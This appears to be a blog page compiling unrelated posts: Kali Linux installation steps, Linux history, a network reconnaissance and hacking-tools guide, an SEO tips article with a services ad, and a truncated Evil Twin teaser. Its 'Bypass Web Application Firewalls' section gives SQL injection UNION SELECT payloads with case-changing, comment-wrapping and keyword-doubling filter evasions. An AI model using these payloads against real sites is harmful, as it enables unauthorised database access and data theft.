Sunday, July 19, 2015

Linux Installation

Installation Minimum requirements:

  • Bootable CD-DVD Drive / USB Stick

·       A minimum of 8 GB disk space for the Kali Linux install.
·       For i386 and amd64 architectures, a minimum of 512MB RAM.
·       You will also need an active Internet connection before installation. This is very important or you will not be able to configure and repositories during installation.

-         Download Kali Linux and either burn the ISO to DVD, or prepare a USB stick with Kali Linux Live as the installation medium.

When you start Kali you will be presented with a Boot Install screen. You may choose what type of installation (GUI based or Text Based) you would like to perform.



Select the local language preference, country, and keyboard preferences.


Select a hostname for the Kali Linux host. The default hostname is Kali.

 

Select a password.
Simple passwords may not work so chose something that has some degree of complexity.


The next prompt asks for your time zone. Modify accordingly and select continue. The next example shows selecting Eastern Standard time.


Select Manual, then click Continue.



1. Create the boot partition
Select Create a new partition, then click Continue.



Allocate a suitable disk space to it. Any value more than 50 MB is good. More is better. Continue.


If this is the first partition on ths disk, the installer will create it as a Primarypartition, which is just fine. Subsequent partitions will be created as Logicalpartitions, which is just fine, too. 


The default is good. Continue.


The partition has been created. Now we need to specify that we want it mounted at /boot. To do that, double-click on the Mount point line. You'll have to do this to change the mount point of any partition.


Select /boot from the list of options.


That's all you need to do for this partition


Select Done setting up the partition, then click Continue.


2. Create the root partition
Back to the main partitioning window, you should see the new partition you just created and the available free space. Select the latter, then click Continue to create the next partition, which will be for the root partition. Note that this step will have to be repeated to create subsequent partitions.


Continue.


A fresh installation of Kali Linux 1.0.6 takes up more than 9.5 GB of disk space, so assign this partition enough disk space to install the system and also sufficient to account for future growth in disk usage. Continue.
The default is good. Continue.


Continue.


By default, it should be mounted at /, so select Done setting up the partition, then click Continue.


3. Create the partition for /home
After selecting the remaining free space from the main partitioning window, then clicking Continue, you should see this window, which should be familiar to you by now. Select Create a new partition, then click Continue.



Since this partition will be mounted at /home, assign it as much disk space as you have available. Continue.

Continue....



Continue..


The default settings are good, so select Done setting up the partition, then clickContinue.


4. Create the Swap partition
This will be the last partition. Continue.


On a 64-bit system, 4 GB for Swap is good enough. On a 32-bit system, 2 GB or less is enough. Continue.


Continue...


You need to change the default setting here, so double-click on the Use as line and select swap area from the list of options in the window that opens..


Select Done setting up the partition. Continue.


Back to the main partitioning window, you should see all the partitions that you created. Verify that all is well, then select Finish partitioning and write changes to disk


Yes. Continue. That's the end for how to create partitions manually for Kali Linux (1.0.6).


Kali Linux using central repositories to distribute application packages. If you would like to install these packages, you need to use a network mirror. The packages are downloaded via HTTP protocol. If your network uses a proxy server, you will also need to configure the proxy settings for you network..


Kali will be prompt to install GRUB. GRUB is a multi-bootlader that gives the user the ability to pick and bootup to multiple operating systems. In almost all cases, you should select to install GRUB. If you are configuring your system to duel boot, you will want to make sure GRUB recognizes the other operating systems in order for it to give users the options to boot into an alternative operating system. If it does not detect any other operating systems, the machine will automatically boot into Kali Linux..


Congratulations! You have finished installing Kali Linux. You will want to remove all media (physical or virtual) and select continue to reboot your system

Linux


LINUX : 

is a Unix-like and mostly POSIX-compliant  computer operating system assembled under the model of free and open-source software development and distribution. The defining component of Linux is the Linux kernel, an operating system kernel first released on 5 October 1991 by Linus Torvalds. The Free Software Foundation uses the name GNU/Linux to describe the operating system.
Linux is the first truly free Unix-like operating system. The underlying GNU Project was launched in 1983 byRichard Stallman originally to develop a Unix-compatible operating system called GNU, intended to be entirely free software. Many programs and utilities were contributed by developers around the world, and by 1991 most of the components of the system were ready. Still missing was the kernel.
Linus Torvalds invented Linux itself in 1991. This kernel, which is called Linux, was afterwards combined with the GNU system to produce a complete free operating system.
Linux Kernel was bundled with many software's from various distributors and it gave rise to many flavors of  LINUX.



Features Of Linux OS:


1. Open Source- Free
2. Multitasking
3. Multi-User
4.Portable
5.Reliability
6.Scalability
7.Networking & Security

Network Hacking

Ways To Attack a Network:
Ping
The IP address gives the attacker’s Internet address. The numerical address like 212.214.172.81 does not reveal much. You can use PING to convert the address into a domain name in WINDOWS: The Domain Name Service (DNS) protocol reveals the matching domain name.  PING stands for “Packet Internet Groper” and is delivered with practically every
Internet compatible system, including all current Windows versions.
Make sure you are logged on to the net. Open the DOS shell and enter
the following PING command:
Ping –a 123.123.12.1
Ping will search the domain name and reveal it. You will often have information on the provider the attacker uses e.g.:
 dialup21982.gateway123.provider.com
Pinging is normally the first step involved in hacking the target. Ping uses
ICMP (Internet Control Messaging Protocol) to determine whether the target host is reachable or not. Ping sends out ICMP Echo packets to the target host, if the target host is alive it would respond back with ICMP
Echo reply packets.
All the versions of Windows also contain the ping tool. To ping a remote host follow the procedure below.
Click Start and then click Run. Now type ping
(For example: ping yahoo.com)
This means that the attacker logged on using “provider.com”.
Unfortunately, there are several IP addresses that cannot be converted
into domain names.
For more parameter that could be used with the ping command, go to
DOS prompt and type ping /?.

Ping Sweep
If you are undetermined about your target and just want a live system, ping sweep is the solution for you. Ping sweep also uses ICMP to scan for live systems in the specified range of IP addresses. Though Ping sweep is similar to ping but reduces the time involved in pinging a range of IP addresses. Nmap (http://www.insecure.org) also contains an option
to perform ping sweeps.

Tracert: 
 Tracert is another interesting tool available to find more interesting information about a remote host. Tracert also uses ICMP.
Tracert helps you to find out some information about the systems involved in sending data (packets) from source to destination. To perform a tracert follow the procedure below.
Tracer connects to the computer whose IP has been entered and reveals all stations starting from your Internet connection. Both the IP address as well as the domain name (if available) is displayed.
If PING cannot reveal a name, Traceroute will possibly deliver the name of the last or second last station to the attacker, which may enable conclusions concerning the name of the provider used by the attacker and the region from which the attacks are coming.

Go to DOS prompt and type tracert  
 (For example: tracert yahoo.com).
But there are some tools available like Visual Traceroute which help you
even to find the geographical location of the routers involved.
http://www.visualware.com/visualroute


Port Scanning:-
After you have determined that your target system is alive the next  important step would be to perform a port scan on the target system.
There are a wide range of port scanners available for free. But many of  them uses outdated techniques for port scanning which could be easily recognized by the network administrator. Personally I like to use Nmap (http://www.insecure.org) which has a wide range of options. You can download the NmapWin and its source code from:
http://www.sourceforge.net/projects/nmapwin.


Apart from port scanning Nmap is capable of identifying the Operating system being used, Version numbers of various services running,
firewalls being used and a lot more.

Common ports:
Below is a list of some common ports and the respective services
running on the ports.
20 FTP data (File Transfer Protocol)
21 FTP (File Transfer Protocol)
22 SSH
23 Telnet
25 SMTP (Simple Mail Transfer Protocol)
53 DNS (Domain Name Service)
68 DHCP (Dynamic host Configuration Protocol)
79 Finger
80 HTTP
110 POP3 (Post Office Protocol, version 3)
137 NetBIOS-ns
138 NetBIOS-dgm
139 NetBIOS
143 IMAP (Internet Message Access Protocol)
161 SNMP (Simple Network Management Protocol)
194 IRC (Internet Relay Chat)
220 IMAP3 (Internet Message Access Protocol 3)
389 LDAP
443 SSL (Secure Socket Layer)
445 SMB (NetBIOS over TCP)
Besides the above ports they are even some ports known as Trojan
ports used by Trojans that allow remote access to that system.


Vulnerability Scanning:
Every operating system or the services will have some vulnerabilities due to the
programming errors. These vulnerabilities are crucial for a successful hack. Bugtraq is
an excellent mailing list discussing the vulnerabilities in the various system. The
exploit  code writers write exploit codes to exploit these vulnerabilities existing in a system.

There are a number of vulnerability scanners available to scan the host for known vulnerabilities. These vulnerability scanners are very important for a network administrator to audit the network security.
Some of such vulnerability scanners include Shadow Security Scanner,Stealth HTTP Scanner, Nessus, etc. Visit
http://www.securityfocus.com vulnerabilities and exploit codes of various
operating systems. Packet storm security
(http://www.packetstormsecurity.com) is also a nice pick.

Tools Descriptions:
1. Nmap
I think everyone has heard of this one, recently evolved into the 4.x series.
Nmap (Network Mapper) is a free open source utility for network exploration
or security auditing. It was designed to rapidly scan large networks, although
it works fine against single hosts. Nmap uses raw IP packets in novel ways to
determine what hosts are available on the network, what services (application
name and version) those hosts are offering, what operating systems (and OS
versions) they are running, what type of packet filters/firewalls are in use,
and dozens of other characteristics. Nmap runs on most types of computers and
both console and graphical versions are available. Nmap is free and open source.
Can be used by beginners (-sT) or by pros alike (packet_trace). A very
versatile tool, once you fully understand the results.

2. Nessus Remote Security Scanner
Recently went closed source, but is still essentially free. Works with a client-
server framework.
Nessus is the worlds most popular vulnerability scanner used in over 75,000
organizations world-wide. Many of the worlds largest organizations are
realizing significant cost savings by using Nessus to audit business-critical
enterprise devices and applications.

3. John the Ripper
Yes, JTR 1.7 was recently released!
John the Ripper is a fast password cracker, currently available for many
flavors of Unix (11 are officially supported, not counting different
architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect
weak Unix passwords. Besides several crypt(3) password hash types most commonly
found on various Unix flavors, supported out of the box are Kerberos AFS and
Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
You can get JTR Here - http://www.openwall.com/john/

4. Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive
tests against web servers for multiple items, including over 3200 potentially
dangerous files/CGIs, versions on over 625 servers, and version specific
problems on over 230 servers. Scan items and plugins are frequently updated and
can be automatically updated (if desired).
Nikto is a good CGI scanner, there are some other tools that go well with Nikto
(focus on http fingerprinting or Google hacking/info gathering etc, another
article for just those).

5. SuperScan
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the
highly popular Windows port scanning tool, SuperScan.
If you need an alternative for nmap on Windows with a decent interface, I
suggest you check this out, it’s pretty nice.
Get SuperScan Here - http://www.foundstone.com/index.htm
subnav=resources/navigation.htm&subcontent=/resources/proddesc/superscan4.htm

6. p0f
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the
operating system on:
- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.
Basically it can fingerprint anything, just by listening, it doesn’t make ANY
active connections to the target machine.

7. Wireshark (Formely Ethereal)
Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you
capture and interactively browse the contents of network frames. The goal of
the project is to create a commercial-quality analyzer for Unix and to give
Wireshark features that are missing from closed-source sniffers.
Works great on both Linux and Windows (with a GUI), easy to use and can
reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.
Get Wireshark Here - http://www.wireshark.org/

8. Yersinia
Yersinia is a network tool designed to take advantage of some weakeness in
different Layer 2 protocols. It pretends to be a solid framework for analyzing
and testing the deployed networks and systems. Currently, the following network
protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery
Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration
Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch
Link Protocol (ISL), VLAN Trunking Protocol (VTP).
The best Layer 2 kit there is.
Get Yersinia Here - http://yersinia.sourceforge.net/

9. Eraser
Eraser is an advanced security tool (for Windows), which allows you to
completely remove sensitive data from your hard drive by overwriting it several
times with carefully selected patterns. Works with Windows 95, 98, ME, NT,
2000, XP and DOS. Eraser is Free software and its source code is released under
GNU General Public License.
An excellent tool for keeping your data really safe, if you’ve deleted it..make
sure it’s really gone, you don’t want it hanging around to bite you in the ass.

10. PuTTY
PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms,
along with an xterm terminal emulator. A must have for any h4. 0r wanting to
telnet or SSH from Windows without having to use the crappy default MS command
line clients.

11. LCP
Main purpose of LCP program is user account passwords auditing and recovery in
Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute
force session distribution, Hashes computing.
A good free alternative to L0phtcrack.
LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack
article.

12. Cain and Abel
My personal favourite for password cracking of any kind.
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It
allows easy recovery of various kind of passwords by sniffing the network,
cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis
attacks, recording VoIP conversations, decoding scrambled passwords, revealing
password boxes, uncovering cached passwords and analyzing routing protocols.
The program does not exploit any software vulnerabilities or bugs that could
not be fixed with little effort.
Get Cain and Abel Here - http://www.oxid.it/cain.html

13. Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion
detection system. Kismet will work with any wireless card which supports raw
monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.
A good wireless tool as long as your card supports rfmon (look for an orinocco
gold).

14. NetStumbler
Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux
counterparts, but it’s easy to use and has a nice interface, good for the
basics of war-driving.
NetStumbler is a tool for Windows that allows you to detect Wireless Local Area
Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:
Verify that your network is set up the way you intended.
Find locations with poor coverage in your WLAN.
Detect other networks that may be causing interference on your network.
Detect unauthorized rogue access points in your workplace.
Help aim directional antennas for long-haul WLAN links.
Use it recreationally for WarDriving.
Get NetStumbler Here - http://www.stumbler.net/
15. Hping
To finish off, something a little more advanced if you want to test your TCP/IP
packet monkey skills.
hping is a command-line oriented TCP/IP packet assembler/analyzer. The
interface is inspired to the ping unix command, but hping isn’t only able to
send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a
traceroute mode, the ability to send files between a covered channel, and many
other features.
Get hping Here - http://www.hping.org/

Bypass Web Application Firewalls

Web application firewalls are designed to protect web applications from known attacks, such as SQL injection attacks, that are commonly used to compromise websites. They do this by intercepting requests sent by clients and enforcing strict rules about their formatting and payload. Today we demonstrate some tricks to bypass Web application firewall  (WAF).

Sqli
http://xyz.com/detail.php?id=44 union all select 1,2,3,4,5— -

By passed Sqli
http://
xyz.com/detailphp?id=44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5— -


By Function 
Capitalization:-
Some Web Application Firewalls will filter only lowercase alphabets, So we can easily bypass  by case changing.

Actual query
http://
xyz.com/detail.php?id=44 UNION SELECT 1,2,3,4,5—

Query to bypass the WAF

http://
xyz.com/detail.php?id=-1 uniOn SeLeCt 1,2,3,4,5—


By Replaced Keywords:-

Some WAF's will escape certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word within another like below script.

Actual query
http://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5—


Query to bypass the WAF
http://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5-- - 

We hope you enjoyed this trick.

Search engine optimization or SEO



Search engine optimization or SEO is the hottest way to drive targeted traffic to your website. Maximizing the benefits of a well optimized website will yield lots of earnings for the marketer. However, optimizing your site might cost you thousands of dollars if you are not skilled in this area.

But to tell you the truth, you can essentially get information on low cost SEO anywhere in the Internet. But only several really show you how to work out an affordable search engine optimization endeavor. And those few that really inform include this article. 

Keyword Research Tools
-------------------------------
You must do keyword research before you start optimizing your site, that much is obvious, but what tools should you use?
There are two excellent keyword research tools that I can recommend as professional tools. They are Wordtracker and Keyword Discovery. Both are great and both are different. Firstly start with with Wordtracker and then move over to Keyword Discovery after a year or so.

If you optimize a site with the wrong keywords you may end up with a high ranking site but won't convert your traffic! Correctly identifying the best keywords and search terms using a keyword search tool will help your odds of success and give you a fighting chance to target prospects who are more likely to turn into clients.

Check it out if you would like more information.
1. http://www.wordtracker.com/
2. http://www.keyworddiscovery.com/
3. http://www.seoscribe.com/

Use The META Description Tag
----------------------------------------
All websites should use the HTML description tag. If you have too many pages to add it to, at least put in on your home page and any core pages that bring in search result traffic. Google will use the META description you place on your site if the user searched for a keyword that exists in the META description. Google is giving us some measure of control.

Create a Website Sitemap

-------------------------------
Some SEO tips can be hard to explain, but this is one of the few that is relatively easy to do and can be done manually with small or large sites. Create a sitemap of your website. There are a few good reasons to do this.
It allows easier indexing of your site by the search engines.
In other words, it helps the search engines to find all the pages on your site. Some websites only have a few of their pages in the search engines and this can be due to poor linking, sparse navigation or a host of other reasons.
It provides PageRank or link popularity to all pages it links to.
If you read about SEO then you have read how important it is to have high-quality links poiting to your site from the sites.
A sitemap can become another source of quality links with descriptive text for your own pages. Making navigation easier by including a sitemap is just good business sense as well as SEO sense.

Example: http://www.xyz.com/sitemap/


Duplicate Content & URL Canonicalization
-------------------------------------------------------
Before we get into this exclusive tip, let me provide a definition for the term Canonicaliztion.
"It is the process of converting data that has more than one possible representation into a standard canonical representation."
If your site has multiple pages with the same content possibly through a Content Management System(CMS) or through duplicate navigation, or because it actually exists in multiple versions, you could be hurting your search engine ranking results. 

Most often this problem can be found on a site's homepage. For example: Search engines view your homepage as having more than one version. How? take a look at the following urls. All point to the same page, but to the search engines they are different. http://www.yoursite.com, http://yoursite.com, http://yoursite.com/index.html and http://www.yoursite.com/index.html. The search engines may find up to four home pages that have the same content.
While this may not cause your site to be unranked it is certainly not helping and can easily cause poor rankings. That is shame for something that is so easily corrected. Most often this is caused by links pointing to different versions of your site. You can't change all the links coming into your site, but you can use the 301-redirect to solve this by pointing all versions of your homepage to the full url.

You can read more at the following links:
1. http://en.wikipedia.org/wiki/Canonicalization 
2. http://www.bigoakinc.com/blog/how-to-do-a-301-redirect/




Social Bookmarking
-------------------------
Social bookmarking involves saving bookmarks (web addresses) to public Web site such as Digg or Del.icio.us so you can access these bookmarks from any computer connected to the web. Your favorite bookmarks are also available for others to view and follow as well, hence the social aspect. If you wish to create your own social bookmarks, you must register with a social bookmarking site.
Bookmark sites you generally would like to share or feel are valuable, which of course can contain bookmarked web addresses of your own site. If enough people agree with the value of a bookmark you have placed they will bookmark it to and as the popularity grows your site traffic will grow.
Don't abuse this by submitting every page of your site, try to be judicious and think about what pages of your site may be helpful and of interest to other web surfers.

Here are some of the more popular social bookmarking sites:
1. Digg
2. Del.icio.us
3. StumbleUpon
4. Reddit
5. Squidoo

Get To Know Google Services
------------------------------------
What would an SEO Consultant's life be like without Google?
I've listed many services that Google offers and I'm sure you may be a bit surprised at how many different pies the search giant's thumb is actuall in.
Google Webmasters: http://www.google.com/webmasters
Google Analytics:     http://www.google.com/analytics
Google AdSense:       http://www.google.com/adsense
Google Answers:       http://answers.google.com/
Google Blog Search:  http://blogsearch.google.com/
Google Bookmarks:  http://www.google.com/bookmarks
Google Directory:     http://www.google.com/dirhp
Google Groups:         http://groups.google.com/
Google Sitemaps:      http://www.google.com/webmasters/sitemaps/


Search Engine & Directory Submissions

-----------------------------------------------------------
Directories are an easy way to build links because anyone can submit age get listed. Directories can, therefore, be of little use for the same reason. Of course getting in directories can be time consuming but it is a one-time affair and usually worth the time. They provide one-way links which will increase your online presence. Not all directories are created equal and paying for the better ones is often money well spent.

Select the best category for your site and follow the instructions on the submission form carefully. Write your descriptions without sensational text. Descriptions of sites should describe the content of the site concisely and accurately When submitting to directories, make sure to vary anchor text and use keywords in the description and title fields.

Choose the most appropriate category for your site. Finding a category that best matches your site's theme or content will increase traffic from the directory and provide higher quality one-way link to your-site for the search engines to follow.

A few of the more search engine friendly directories for valuable links are the following:
1. http://dir.search.yahoo.com/?fr=yfp-t-501
2. http://www.dmoz.org/
3. http://www.business.com/
4. http://bestoftheweb.com/
5. http://www.avivadirectory.com/


We are providing SEO Services..

Is your website submit to all search engines. ?
Do you have a require keywords according to your website ?
Do you want to do SEO for your website ?

Contact us for more details
mail to pathak.munjal@gmail.com

Evil Twin attack

Evil Twin Attack is attack is frequently carried upon wireless access points with malicious intentions. This attack happens when...